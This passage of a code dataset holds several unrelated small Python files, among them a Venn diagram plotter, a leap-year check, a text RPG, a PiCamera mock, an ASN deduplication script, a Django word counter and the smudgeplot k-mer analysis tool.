(HTML_DIR / f\"{title}.html\").write_text(preprocessed_html)\n\n convert(\n html=preprocessed_html,\n out_file=EPUB_DIR / f\"{title}.epub\",\n metadata=metadata\n )\n except Exception as e:\n logger.exception(e)\n","repo_name":"LennartKeller/IMSDB_EPub","sub_path":"convert2epub.py","file_name":"convert2epub.py","file_ext":"py","file_size_in_byte":8653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12537330728","text":"#!/usr/bin/env python3\n\nimport pandas as pd\nfrom matplotlib import pyplot as plt \nfrom matplotlib_venn import venn3, venn3_circles\nfrom matplotlib_venn import venn2, venn2_circles, venn2_unweighted\n\n\n### Input: 3 species names, 3 separate lists an output file name and a title ###\n### Output: a png file of a weighted venn diagram labeled with species names and a custom title ###\n\n\n# Name list and title parameters\ndef make_venn_diagram(species1, species2, species3, list1, list2, list3, output_name, title):\n\n # Color scheme for venn circles\n colors = ['darkviolet','deepskyblue','blue']\n \n # Generate the diagram with passed in data\n venn_diagram = venn3([set(list1), set(list2), set(list3)], (species1, species2, species3), set_colors = colors)\n\n # Formatting\n plt.title(title)\n \n i = 0\n for text in venn_diagram.set_labels:\n text.set_fontweight('bold')\n text.set_fontsize(16)\n text.set_color(colors[i])\n i+=1\n\n for text in venn_diagram.subset_labels:\n text.set_color('white')\n text.set_fontsize(14)\n\n # Output venn diagram to a png image\n plt.savefig(f'{output_name}.png')\n\n\n\ndef main():\n\n species1 = sys.argv[1]\n species2 = sys.argv[2]\n species3 = sys.argv[3]\n\n list1 = sys.argv[4]\n list2 = sys.argv[5]\n list3 = sys.argv[6]\n\n output_name = sys.argv[7]\n title = sys.argv[8]\n\n make_venn_diagram(species1, species2, species3, list1, list2, list3, output_name, title)\n\nif __name__ == '__main__':\n main()\n","repo_name":"jnjahncke/hot-seq-summer","sub_path":"make_venn_diagram.py","file_name":"make_venn_diagram.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22488514980","text":"#!/usr/bin/python3\n\"\"\"funcion que verifica si un año es bisiesto\"\"\"\naño = int(input(\"ingrese un año: \"))\ndef año_bisiesto(año):\n if(año % 4 == 0 and año % 100 != 0):\n return True\n elif(año % 4 == 0 and año % 400 == 0):\n return True\n else:\n return False\n\nresultado = año_bisiesto(año)\nprint(resultado)\n\n","repo_name":"ANDRES3021/python","sub_path":"ejercicios_parte5/Ejercicio3.py","file_name":"Ejercicio3.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38009072447","text":"#LOOPS\r\n\r\nmy_condition = 0\r\nwhile my_condition < 10:\r\n print(my_condition)\r\n my_condition += 1 \r\n\r\nwhile my_condition < 20:\r\n my_condition += 1\r\n if my_condition == 15:\r\n print(\"Se detiene la ejecución\") \r\n break\r\n print(my_condition) \r\nprint(\"La ejecución continúa\") \r\n\r\nmy_list = [34, 67, 5, 89, 15]\r\nmy_dict = {\"Nombre\" : \"Marina\", \"Apellido\" : \"Sanchez\", \"Edad\": 20}\r\nfor element in my_list:\r\n print(element)\r\nfor element in list(my_dict.values()):\r\n print(element)\r\nelse:\r\n print(\"El bucle for para mi diccionario ha finalizado\") \r\n\r\nfor element in my_list: #Si el elemento es edad para la ejecución\r\n print(element) \r\n if element == \"Edad\":\r\n break\r\nfor element in my_list: #Si el elemento es edad continua la ejecución\r\n print(element) \r\n if element == \"Edad\":\r\n continue ","repo_name":"marinasguarino/Basic-Python","sub_path":"Python/Basic/09_loops.py","file_name":"09_loops.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11878918261","text":"from random import randint\r\nclass Character:\r\n def __init__(self, name, weapon, level):\r\n self.name = name\r\n self.weapon = weapon\r\n self.level = level\r\n self.hp = 30 + self.level * 20\r\n \r\n def attack(self, target):\r\n attack = self.weapon.attack()\r\n print(f\"{self.name} attacked {target.name} with a {self.weapon.name} for {attack} damage!\")\r\n target.hp -= attack\r\n \r\n def heal(self):\r\n self.hp += 10\r\n print(f\"{self.name} is healing...\")\r\n \r\n def is_alive(self):\r\n if self.hp <= 0:\r\n return False\r\n else:\r\n return True\r\n \r\n def __str__(self):\r\n return f\"{self.name}:\\nCurrent Weapon: {self.weapon}\\n\\tLevel: {self.level}\\n\"\r\n\r\nclass Weapon:\r\n def __init__(self, name, crit, ap):\r\n self.name = name\r\n self.crit = crit\r\n self.ap = ap\r\n \r\n # Calculates the damage that the weapon does for a character's attack\r\n def attack(self):\r\n ran_num = randint(1, 100)\r\n if ran_num <= self.crit:\r\n print(\"CRITICAL STRIKE!\")\r\n return randint(self.ap+1, self.ap*2)\r\n\r\n elif ran_num <= 1:\r\n print(f\"Your {self.name} glanced the foe!\")\r\n return randint(1, self.ap//2)\r\n else:\r\n return randint(self.ap//2, self.ap)\r\n\r\n def __str__(self):\r\n return f\"{self.name}\\n\\tDamage: {str(self.ap)}\\n\\tCritical Strike Chance: {str(self.crit)}%\"\r\n\r\nclass Game:\r\n def __init__(self):\r\n self.hero_weapon = Weapon(\"Master Sword\", 25, 12)\r\n self.hero = Character(\"Link\", self.hero_weapon, 2)\r\n self.enemy_weapon = Weapon(\"Giant Club\", 35, 8)\r\n self.enemy = Character(\"Ganon\", self.enemy_weapon, 1)\r\n \r\n def play(self):\r\n i = 0\r\n while True:\r\n random_num = randint(1,100)\r\n i += 1\r\n print(f\"Round {i}...\")\r\n if random_num <= 50:\r\n print(f\"{self.hero.name} HP: {self.hero.hp}\\t{self.enemy.name} HP: {self.enemy.hp}\")\r\n turn = input(\"Would you like to (h)eal or (a)ttack?\\n> \")\r\n while True:\r\n if turn.lower() == \"attack\" or turn.lower() == \"a\":\r\n self.hero.attack(self.enemy)\r\n break\r\n elif turn == \"heal\" or turn == \"h\":\r\n self.hero.heal()\r\n break\r\n else:\r\n turn = input(\"That is not a valid input! Please enter one of the given options...\\n> \")\r\n\r\n if self.enemy.hp < 20:\r\n rand_num = randint(1,100)\r\n if rand_num <= 50:\r\n self.enemy.heal()\r\n else:\r\n self.enemy.attack(self.hero)\r\n else:\r\n self.enemy.attack(self.hero)\r\n print(f\"{self.hero.name} HP: {self.hero.hp}\\t{self.enemy.name} HP: {self.enemy.hp}\\n\")\r\n if self.hero.is_alive() == False:\r\n print(f\"{self.enemy.name} has killed {self.hero.name} with its {self.enemy.weapon.name}!\")\r\n break\r\n elif self.enemy.is_alive() == False:\r\n print(f\"{self.hero.name} has killed {self.enemy.name} with its {self.hero.weapon.name}!\")\r\n break\r\n input(\"Press enter when you are ready to continue!\")\r\n \r\n else:\r\n print(f\"{self.hero.name} HP: {self.hero.hp}\\t{self.enemy.name} HP: {self.enemy.hp}\")\r\n if self.enemy.hp < 20:\r\n rand_num = randint(1,100)\r\n if rand_num <= 50:\r\n self.enemy.heal()\r\n else:\r\n self.enemy.attack(self.hero)\r\n else:\r\n self.enemy.attack(self.hero)\r\n\r\n turn = input(\"Would you like to (h)eal or (a)ttack?\\n> \")\r\n while True:\r\n if turn.lower() == \"attack\" or turn.lower() == \"a\":\r\n self.hero.attack(self.enemy)\r\n break\r\n elif turn == \"heal\" or turn == \"h\":\r\n self.hero.heal()\r\n break\r\n else:\r\n turn = input(\"That is not a valid input! Please enter one of the given options...\\n> \")\r\n\r\n print(f\"{self.hero.name} HP: {self.hero.hp}\\t{self.enemy.name} HP: {self.enemy.hp}\\n\")\r\n if self.hero.is_alive() == False:\r\n print(f\"{self.hero.name} has killed {self.enemy.name} with its {self.hero.weapon.name}!\")\r\n break\r\n elif self.enemy.is_alive() == False:\r\n print(f\"{self.enemy.name} has killed {self.hero.name} with its {self.enemy.weapon.name}!\")\r\n break\r\n input(\"Press enter when you are ready to continue!\")\r\n print(\"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\")\r\n\r\n \r\n\r\ndef main():\r\n game = Game()\r\n game.play()\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Gameatron/python-things","sub_path":"CS1/Classes/my_rpg.py","file_name":"my_rpg.py","file_ext":"py","file_size_in_byte":5174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20587421949","text":"__author__ = 'laurencoombe'\n\nclass Alignment:\n\n def __init__(self, score, correspondingVertices, indelVertices, q_edges, r_edges):\n self.score = score\n self.correspVertices = correspondingVertices\n self.indelVertices = indelVertices\n self.query_edges = q_edges\n self.ref_edges = r_edges\n\n","repo_name":"lcoombe/AutoBioGraphers","sub_path":"GraphMatch/Alignment.py","file_name":"Alignment.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40849685546","text":"import unittest.mock\nimport time\nimport io\nimport logging\nimport threading\nfrom PIL import Image as PILImage\nimport cv2\nimport numpy\n\nlogger = logging.getLogger()\n\nclass PiCameraMock(object):\n \"\"\"Implements PiCamera mock class\n PiCamera is the library used to access the integrated Camera, this mock class emulates the capture functions in order to test the streamer loop.\n \"\"\"\n\n def __init__(self):\n self.resolution = None\n self.framerate = None\n self.exposure_mode = None\n self.annotate_text = None\n self.splitter_recorders = {}\n self.images = {}\n i = open('test/test_image.jpeg', 'rb')\n image_jpeg = i.read()\n i.close()\n self.images[\"mjpeg\"] = image_jpeg \n self.images[\"bgra\"] = cv2.cvtColor(numpy.array(PILImage.open(io.BytesIO(image_jpeg))), cv2.COLOR_RGB2BGRA)\n \n\n class ImageRecorder(threading.Thread):\n def __init__(self, buffer, image):\n threading.Thread.__init__(self)\n self.buffer = buffer\n self.image = image\n self.go = True\n\n def run(self):\n while self.go:\n self.buffer.write(self.image)\n time.sleep(0.05)\n\n class VideoRecorder(object):\n def __init__(self, buffer, video):\n self.buffer = buffer\n self.video = video\n\n def start_recording(self, buffer, format, splitter_port, quality=None, bitrate=None, resize=None):\n \"\"\"mock start_recording\"\"\"\n print(format)\n if format == \"bgra\" and resize:\n self.images[format] = cv2.resize(self.images[format], resize)\n if format == \"h264\":\n f = open(\"test/test.h264\", \"rb\")\n video = f.read()\n f.close()\n self.splitter_recorders[splitter_port] = self.VideoRecorder(buffer, video)\n else:\n self.splitter_recorders[splitter_port] = self.ImageRecorder(buffer, self.images[format])\n self.splitter_recorders[splitter_port].start() \n\n def stop_recording(self, splitter_port):\n if splitter_port < 2:\n self.splitter_recorders[splitter_port].go = False\n self.splitter_recorders[splitter_port].join()\n else:\n recorder = self.splitter_recorders[splitter_port]\n f = open(recorder.buffer, \"wb\")\n f.write(recorder.video)\n f.close()\n\n def close():\n \"\"\"mock close\"\"\"\n pass\n\n","repo_name":"CoderBotOrg/backend","sub_path":"test/picamera_mock.py","file_name":"picamera_mock.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"72"} +{"seq_id":"17568636784","text":"#!/usr/bin/env python3\n\n\"\"\"\nThis script deduplicates ASNs using the most common occurrence while\nmerging together routing data (RIPE) and ASN data (CAIDA).\n\nInputs:\n\n- from stdin we read a _sorted_ list of lines like ` `\nwhere the sort key is the netmask ascending\n\n- from caida_asn_to_name.dbm we read ASN->name mappings\n\nOutput:\n\n- to stdout ` ` where ``\nis the string `
    `\n\nExample input:\n\n 11.0.0.0 8 749\n 12.0.0.0 8 7018\n 17.0.0.0 8 714\n 21.0.0.0 8 749\n\nExample output:\n\n 11.0.0.0 8 749 DoD Network Information Center\n 12.0.0.0 8 7018 AT&T Services, Inc.\n 17.0.0.0 8 714 Apple Inc.\n 21.0.0.0 8 749 DoD Network Information Center\n\"\"\"\n\nimport dbm\nimport sys\nfrom collections import Counter\n\n\ndef main():\n asn_to_orgname = dbm.open(\"caida_asn_to_name.dbm\")\n\n c = Counter()\n current_net = None # \" \"\n for line in sys.stdin:\n net, asn = line.rstrip().rsplit(\" \", 1)\n if net != current_net:\n if current_net is not None:\n # Deduplicate ASNs using the most common occurrence\n oasn = c.most_common(1)[0][0]\n orgname = asn_to_orgname.get(oasn, b\"\").decode()\n print(f\"{current_net} {oasn} {orgname}\")\n c = Counter()\n current_net = net\n c.update([asn])\n\n # Deduplicate ASNs using the most common occurrence\n asn = c.most_common(1)[0][0]\n orgname = asn_to_orgname.get(asn, b\"\").decode()\n print(f\"{current_net} {asn} {orgname}\")\n\n asn_to_orgname.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ooni/asn-db-generator","sub_path":"dedupe_add_caida_orgname.py","file_name":"dedupe_add_caida_orgname.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"588124768","text":"# from django.http import HttpResponse\r\nfrom django.shortcuts import render\r\n\r\n\r\ndef home(request):\r\n return render(request, 'home.html')\r\n\r\n\r\ndef count(request):\r\n user_text = request.GET['text']\r\n total_count = len(user_text)\r\n\r\n word_dict = {}\r\n count_word = 0\r\n\r\n for c in user_text:\r\n if c not in word_dict:\r\n word_dict[c] = 1\r\n else:\r\n word_dict[c] += 1\r\n if c.isalnum():\r\n count_word += 1\r\n\r\n count_punctuation = total_count - count_word\r\n\r\n max_word = max(word_dict, key=lambda x: word_dict[x])\r\n max_value = max(word_dict, key=word_dict.get)\r\n max_word_value = max(word_dict.items(), key=lambda x:x[1])\r\n sorted_dict = sorted(word_dict.items(), key=lambda x:x[1], reverse=True)\r\n\r\n return render(request, 'count.html', {'total_count': total_count,\r\n 'user_text': user_text,\r\n 'word_dict': word_dict,\r\n 'max_word_value': max_word_value,\r\n 'sorted_dict': sorted_dict,\r\n 'count_word': count_word,\r\n 'count_punctuation': count_punctuation\r\n })\r\n\r\n\r\ndef about(request):\r\n return render(request, 'about.html')","repo_name":"liquidwang/Word_count_webapp","sub_path":"wordcount/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2450478839","text":"#!/usr/bin/env python3\n\nimport argparse\nimport sys\nfrom os import system\nfrom math import log\nfrom math import ceil\nimport numpy as np\nfrom scipy.signal import argrelextrema\n# hetkmers dependencies\nfrom collections import defaultdict\nfrom itertools import combinations\n\nversion = '0.2.5'\n\n############################\n# processing of user input #\n############################\n\nclass parser():\n def __init__(self):\n argparser = argparse.ArgumentParser(\n # description='Inference of ploidy and heterozygosity structure using whole genome sequencing data',\n usage='''smudgeplot [options] \\n\ntasks: cutoff Calculate meaningful values for lower/upper kmer histogram cutoff.\n hetkmers Calculate unique kmer pairs from a Jellyfish or KMC dump file.\n plot Generate 2d histogram; infere ploidy and plot a smudgeplot.\n extract Extract kmer pairs within specified coverage sum and minor covrage ratio ranges\\n\\n''')\n argparser.add_argument('task', help='Task to execute; for task specific options execute smudgeplot -h')\n argparser.add_argument('-v', '--version', action=\"store_true\", default = False, help=\"print the version and exit\")\n # print version is a special case\n if len(sys.argv) > 1:\n if sys.argv[1] in ['-v', '--version']:\n self.task = \"version\"\n return\n # the following line either prints help and die; or assign the name of task to variable task\n self.task = argparser.parse_args([sys.argv[1]]).task\n else:\n self.task = \"\"\n # if the task is known (i.e. defined in this file);\n if hasattr(self, self.task):\n # load arguments of that task\n getattr(self, self.task)()\n else:\n argparser.print_usage()\n sys.stderr.write('\"' + self.task + '\" is not a valid task name\\n')\n exit(1)\n\n def hetkmers(self):\n '''\n Calculate unique kmer pairs from a Jellyfish or KMC dump file.\n '''\n argparser = argparse.ArgumentParser(prog = 'smudgeplot hetkmers',\n description='Calculate unique kmer pairs from a Jellyfish or KMC dump file.')\n argparser.add_argument('infile', nargs='?', type=argparse.FileType('r'), default=sys.stdin, help='Alphabetically sorted Jellyfish or KMC dump file (stdin).')\n argparser.add_argument('-o', help='The pattern used to name the output (kmerpairs).', default='kmerpairs')\n argparser.add_argument('--middle', dest='middle', action='store_const', const = True, default = False,\n help='Get all kmer pairs that are exactly the same but in the middle nt. When this flag is used, the input dump must be alphabetically sorted/ (default: different by a SNP at any position).')\n self.arguments = argparser.parse_args(sys.argv[2:])\n\n def plot(self):\n '''\n Generate 2d histogram; infer ploidy and plot a smudgeplot.\n '''\n argparser = argparse.ArgumentParser(prog = 'smudgeplot plot', description='Generate 2d histogram for smudgeplot')\n argparser.add_argument('infile', nargs='?', help='name of the input tsv file with covarages (default \\\"coverages_2.tsv\\\").\"')\n argparser.add_argument('-o', help='The pattern used to name the output (smudgeplot).', default='smudgeplot')\n argparser.add_argument('-q', help='Remove kmer pairs with coverage over the specified quantile; (default none).', type=float, default=1)\n argparser.add_argument('-L', help='The lower boundary used when dumping kmers (default min(total_pair_cov) / 2).', type=int, default=0)\n argparser.add_argument('-n', help='The expected haploid coverage (default estimated from data).', type=float, default=0)\n argparser.add_argument('-t', '--title', help='name printed at the top of the smudgeplot (default none).', default='')\n # argparser.add_argument('-m', '-method', help='The algorithm for annotation of smudges (default \\'local_aggregation\\')', default='local_aggregation')\n argparser.add_argument('-nbins', help='The number of nbins used for smudgeplot matrix (nbins x nbins) (default autodetection).', type=int, default=0)\n argparser.add_argument('-k', help='The length of the kmer.', default=21)\n # argparser.add_argument('-kmer_file', help='Name of the input files containing kmer seuqences (assuming the same order as in the coverage file)', default = \"\")\n argparser.add_argument('--homozygous', action=\"store_true\", default = False, help=\"Assume no heterozygosity in the genome - plotting a paralog structure; (default False).\")\n self.arguments = argparser.parse_args(sys.argv[2:])\n\n def cutoff(self):\n '''\n Calculate meaningful values for lower/upper kmer histogram cutoff.\n '''\n argparser = argparse.ArgumentParser(prog = 'smudgeplot cutoff', description='Calculate meaningful values for lower/upper kmer histogram cutoff.')\n argparser.add_argument('infile', type=argparse.FileType('r'), help='Name of the input kmer histogram file (default \\\"kmer.hist\\\").\"')\n argparser.add_argument('boundary', help='Which bounary to compute L (lower) or U (upper)')\n self.arguments = argparser.parse_args(sys.argv[2:])\n\n def extract(self):\n '''\n Extract kmer pairs within specified coverage sum and minor covrage ratio ranges.\n '''\n argparser = argparse.ArgumentParser(prog = 'smudgeplot extract', description='Extract kmer pairs within specified coverage sum and minor covrage ratio ranges.')\n argparser.add_argument(\"-cov\", \"--coverageFile\",required=True, help=\"coverage file for the kmer pairs\")\n argparser.add_argument(\"-seq\", \"--seqFile\",required=True, help=\"sequences of the kmer pairs\")\n argparser.add_argument(\"-minc\", \"--countMin\",required=True, help=\"lower bound of the summed coverage\", type=int)\n argparser.add_argument(\"-maxc\", \"--countMax\",required=True, help=\"upper bound of the summed coverage\", type=int)\n argparser.add_argument(\"-minr\", \"--ratioMin\",required=True, help=\"lower bound of minor allele ratio\", type=float)\n argparser.add_argument(\"-maxr\", \"--ratioMax\",required=True, help=\"upper bound of minor allele ratio\", type=float)\n self.arguments = argparser.parse_args(sys.argv[2:])\n\n###############\n# task cutoff #\n###############\n\ndef round_up_nice(x):\n digits = ceil(log(x, 10))\n if digits <= 1:\n multiplier = 10 ** (digits - 1)\n else:\n multiplier = 10 ** (digits - 2)\n return(ceil(x / multiplier) * multiplier)\n\ndef cutoff(args):\n # kmer_hist = open(\"data/Mflo2/kmer.hist\",\"r\")\n kmer_hist = args.infile\n hist = np.array([int(line.split()[1]) for line in kmer_hist])\n if args.boundary == \"L\":\n local_minima = argrelextrema(hist, np.less)[0][0]\n L = max(10, int(round(local_minima * 1.25)))\n sys.stdout.write(str(L))\n else:\n # take 99.8 quantile of kmers that are more than one in the read set\n hist_rel_cumsum = np.cumsum(hist[1:]) / np.sum(hist[1:])\n U = round_up_nice(np.argmax(hist_rel_cumsum > 0.998))\n sys.stdout.write(str(U))\n sys.stdout.flush()\n\n############\n# hetkmers #\n############\n\ndef get_one_away_pairs(kmer_index_family, k):\n \"\"\"kmer_index_family is a list of (kmer, index) pairs currently under consideration. k is the kmer length. get_one_away_pairs returns a list of pairs of indices where each pair of indices corresponds to a pair of kmers different in exactly one base.\"\"\"\n\n #This is the base case for the recursion. Return every pair of indices where the kmers corresponding to those indices differ at exactly one base.\n if k == 1:\n return [(i,j) for ((kmer1,i),(kmer2,j)) in combinations(kmer_index_family, 2) if kmer1 != kmer2]\n\n #Initialize one_away_pairs, which will be returned by get_one_away_pairs.\n one_away_pairs = []\n\n #Initialize dictionaries in which the key is a kmer_half (kmer_L or kmer_R) and the value is a list of (other_kmer_half, index) pairs.\n kmer_L_to_index_family = defaultdict(list)\n kmer_R_to_index_family = defaultdict(list)\n\n #Get the locations for the two halves of the kmer.\n k_L = k // 2\n k_R = k-k_L\n i_L_L = 0\n i_L_R = k_L - 1\n i_R_L = k_L\n i_R_R = k-1\n\n #For each kmer and index calculate the corresponding left half and right half, then add the necessary (kmer_half, index) pair to the corresponding entries of the dictionary\n for kmer, i in kmer_index_family:\n kmer_L = kmer[i_L_L:i_L_R+1]\n kmer_R = kmer[i_R_L:i_R_R+1]\n kmer_L_to_index_family[kmer_L].append((kmer_R, i))\n kmer_R_to_index_family[kmer_R].append((kmer_L, i))\n\n #For each left half in which there are multiple kmers with that left half, find the list of pairs in which the right half differs by 1. (aka, if left half matches, recurse on right half).\n for kmer_L_index_family in kmer_L_to_index_family.values(): #same in left half\n if len(kmer_L_index_family) > 1:\n one_away_pairs.extend(get_one_away_pairs(kmer_L_index_family, k_R)) #differ by 1 in right half\n\n del kmer_L_to_index_family\n\n #For each right half in which there are multiple kmers with that same right half, find the list of pairs in which the left half differs by 1. (aka, if right half matches, recurse on left half).\n for kmer_R_index_family in kmer_R_to_index_family.values(): #same in right half\n if len(kmer_R_index_family) > 1:\n one_away_pairs.extend(get_one_away_pairs(kmer_R_index_family, k_L)) #differ by 1 in left half\n\n del kmer_R_to_index_family\n return(one_away_pairs)\n\ndef middle_one_away(args):\n sys.stderr.write('Extracting kmer pairs that differ in the middle nt\\n')\n\n # file_one_away_pairs = open(args.o + '_one_away_pairs.tsv', 'w')\n file_coverages = open(args.o + '_coverages.tsv', 'w')\n file_kmers = open(args.o + '_sequences.tsv', 'w')\n\n duplicated = set()\n filtered = set()\n\n #Initialize a dictionary in which the key is the right kmer_half (not including the middle nucleotide), and the value is a list of (index, coverage) tuples corresponding to kmers that have that particular right kmer_half.\n kmer_R_to_index_family = defaultdict(list)\n\n # read the first line to get the length of the kmer\n with open(args.infile.name) as dump_file:\n kmer, coverage = dump_file.readline().split()\n k = len(kmer)\n\n #Get the locations for the two halves of the kmer.\n k_middle = k // 2\n i_L_L = 0\n i_L_R = k_middle - 1\n i_R_L = k_middle + 1\n i_R_R = k - 1\n\n sys.stderr.write('Saving ' + args.o + '_coverages.tsv and ' + args.o + '_sequences.tsv files.\\n')\n # Read each line of the input file in order to load the kmers and coverages and process the kmer halves.\n current_kmer_L = \"\"\n for i1, line in enumerate(args.infile):\n kmer, coverage1 = line.split()\n coverage1 = int(coverage1)\n\n new_kmer_L = kmer[i_L_L:i_L_R+1]\n kmer_R = kmer[i_R_L:i_R_R+1]\n if new_kmer_L == current_kmer_L:\n if kmer_R in kmer_R_to_index_family:\n if kmer_R in duplicated:\n filtered.discard(kmer_R)\n else:\n duplicated.add(kmer_R)\n filtered.add(kmer_R)\n else:\n for kmer_R in filtered:\n (i1, coverage1), (i2, coverage2) = kmer_R_to_index_family[kmer_R]\n if coverage2 < coverage1:\n file_coverages.write(str(coverage2) + '\\t' + str(coverage1) + '\\n')\n else:\n file_coverages.write(str(coverage1) + '\\t' + str(coverage2) + '\\n')\n file_kmers.write(current_kmer_L + 'N' + kmer_R + '\\n')\n duplicated = set()\n filtered = set()\n kmer_R_to_index_family = defaultdict(list)\n current_kmer_L = new_kmer_L\n kmer_R_to_index_family[kmer_R].append((i1,coverage1))\n\n file_coverages.close()\n file_kmers.close()\n\ndef all_one_away(args):\n #Initiate kmer and coverages lists.\n kmers = []\n coverages = []\n\n # Read each line of the input file in order to\n # load the kmers and coverages and process the kmer halves.\n for i, line in enumerate(args.infile):\n kmer, coverage = line.split()\n coverage = int(coverage)\n coverages.append(coverage)\n kmers.append(kmer)\n\n sys.stderr.write('Kmers and coverages loaded.\\n')\n\n k = len(kmer) # all the kmers in the dump file have the same length, so I can just calc the number of nts in the last one\n # get_one_away_pairs is a recursive function that gatheres indices of all kmer 1 SNP from each other\n one_away_pairs = get_one_away_pairs([(kmer,i) for i,kmer in enumerate(kmers)], k)\n\n sys.stderr.write('Kmer pairs identified.\\n')\n\n repeated = {}\n for (i1, i2) in one_away_pairs:\n repeated[i1] = i1 in repeated\n repeated[i2] = i2 in repeated\n\n sys.stderr.write('Kmers in unique kmer pairs identified.\\n')\n\n with open(args.o + '_sequences.tsv', 'w') as file_seqs, open(args.o + '_coverages.tsv', 'w') as file_coverages:\n for (i1, i2) in one_away_pairs:\n if not repeated[i1] and not repeated[i2]:\n cov1 = coverages[i1]\n cov2 = coverages[i2]\n if cov1 < cov2:\n file_coverages.write(str(cov1) + '\\t' + str(cov2) + '\\n')\n file_seqs.write(kmers[i1] + '\\t' + kmers[i2] + '\\n')\n else:\n file_coverages.write(str(cov2) + '\\t' + str(cov1) + '\\n')\n file_seqs.write(kmers[i2] + '\\t' + kmers[i1] + '\\n')\n\n sys.stderr.write(args.o + '_families.tsv and ' + args.o + '_coverages.tsv files saved.\\n')\n\ndef extract_kmer_pairs(args):\n index2covs = defaultdict(list)\n\n with open(args.coverageFile,\"r\") as f:\n for i, row in enumerate(f):\n row_list = row.rstrip(\"\\n\").split(\"\\t\")\n countL = int(row_list[0])\n countR = int(row_list[1])\n\n cov_sum = countL + countR\n cov_ratio = countL / (countL + countR)\n if cov_sum <= args.countMax and cov_sum >= args.countMin and cov_ratio >= args.ratioMin and cov_ratio <= args.ratioMax:\n # out_cov_h.write(str(countL)+\"\\t\" + str(countR) + \"\\n\")\n #print(str(i1))\n index2covs[i] = [countL, countR]\n\n with open(args.seqFile,\"r\") as f:\n extracted = 0\n for i, row in enumerate(f):\n if len(index2covs[i]) == 2:\n extracted += 1;\n kmer1, kmer2 = row.rstrip('\\n').split('\\t')\n sys.stdout.write(\">kmer_\" + str(i) + \"_1_cov_\" + str(index2covs[i][0]) + \"\\n\")\n sys.stdout.write(kmer1 + '\\n')\n sys.stdout.write(\">kmer_\" + str(i) + \"_2_cov_\" + str(index2covs[i][1]) + \"\\n\")\n sys.stdout.write(kmer2 + '\\n')\n sys.stderr.write(\"Extracting \" + str(extracted) + \" of total kmer pairs: \" + str(i + 1) + '\\n')\n sys.stderr.write(str(round(100 * extracted / (i + 1), 3)) + ' %\\n')\n\n#####################\n# the script itself #\n#####################\n\ndef main():\n _parser = parser()\n\n sys.stderr.write('Running smudgeplot v' + version + \"\\n\")\n if _parser.task == \"version\":\n exit(0)\n\n sys.stderr.write('Task: ' + _parser.task + \"\\n\")\n\n if _parser.task == \"cutoff\":\n cutoff(_parser.arguments)\n\n if _parser.task == \"hetkmers\":\n args = _parser.arguments\n if args.middle:\n middle_one_away(args)\n else :\n all_one_away(args)\n\n if _parser.task == \"plot\":\n # the plotting script is expected ot be installed in the system as well as the R library supporting it\n args = _parser.arguments\n plot_args = \"-i \\\"\" + args.infile + \"\\\" -o \\\"\" + args.o + \"\\\" -k \" + str(args.k)\n if args.q != 1:\n plot_args += \" -q \" + str(args.q)\n if args.L != 0:\n plot_args += \" -L \" + str(args.L)\n if args.n != 0:\n plot_args += \" -n \" + str(args.n)\n if args.title:\n plot_args += \" -t \\\"\" + args.title + \"\\\"\"\n if args.nbins != 0:\n plot_args += \" -nbins \" + str(args.nbins)\n if args.homozygous:\n plot_args += \" --homozygous\"\n sys.stderr.write(\"Calling: smudgeplot_plot.R \" + plot_args + \"\\n\")\n system(\"smudgeplot_plot.R \" + plot_args)\n\n if _parser.task == \"extract\":\n extract_kmer_pairs(_parser.arguments)\n\n\n sys.stderr.write(\"\\nDone!\\n\")\n exit(0)\n\nif __name__=='__main__':\n main()\n","repo_name":"KamilSJaron/smudgeplot","sub_path":"exec/smudgeplot.py","file_name":"smudgeplot.py","file_ext":"py","file_size_in_byte":16668,"program_lang":"python","lang":"en","doc_type":"code","stars":190,"dataset":"github-code","pt":"72"} +{"seq_id":"36546344507","text":"import logging\n\nlogging.basicConfig(level=logging.INFO)\n\n\ndef excelColumnName(number: int) -> str:\n \"\"\"\n\n :param number:\n :return:\n\n TC : O(Log 26 N)\n SC : O(1)\n \"\"\"\n\n # Max number of char in column name\n MAX = 50\n\n # Column name containing max characters\n string = ['\\0'] * MAX\n\n # Populate string\n index = 0\n while number > 0:\n\n remainder = number % 26\n\n logging.debug(\"Type of remainder is {} and its value is \\\"{}\\\" Also number is {}\".format(\n type(remainder), remainder, number\n ))\n\n if remainder == 0:\n string[index] = 'Z'\n number = number // 26 - 1\n else:\n string[index] = chr((remainder - 1) + ord('A'))\n number = number // 26\n\n index += 1\n\n # # Reverse string\n # start = 0\n # end = index\n # while start < end:\n # string[start], start[end] = string[end], string[start]\n # start += 1\n # end -= 1\n\n string = string[::-1]\n\n return \"\".join(string[-index:])\n\n\nif __name__ == '__main__':\n number = 80\n print(\"1. For a given number \\\"{}\\\" its corresponding excel column name would be {}\".format(\n number, excelColumnName(number)\n ))\n\n number = 676\n print(\"2. For a given number \\\"{}\\\" its corresponding excel column name would be {}\".format(\n number, excelColumnName(number)\n ))\n number = 702\n print(\"3. For a given number \\\"{}\\\" its corresponding excel column name would be {}\".format(\n number, excelColumnName(number)\n ))\n number = 708\n print(\"4. For a given number \\\"{}\\\" its corresponding excel column name would be {}\".format(\n number, excelColumnName(number)\n 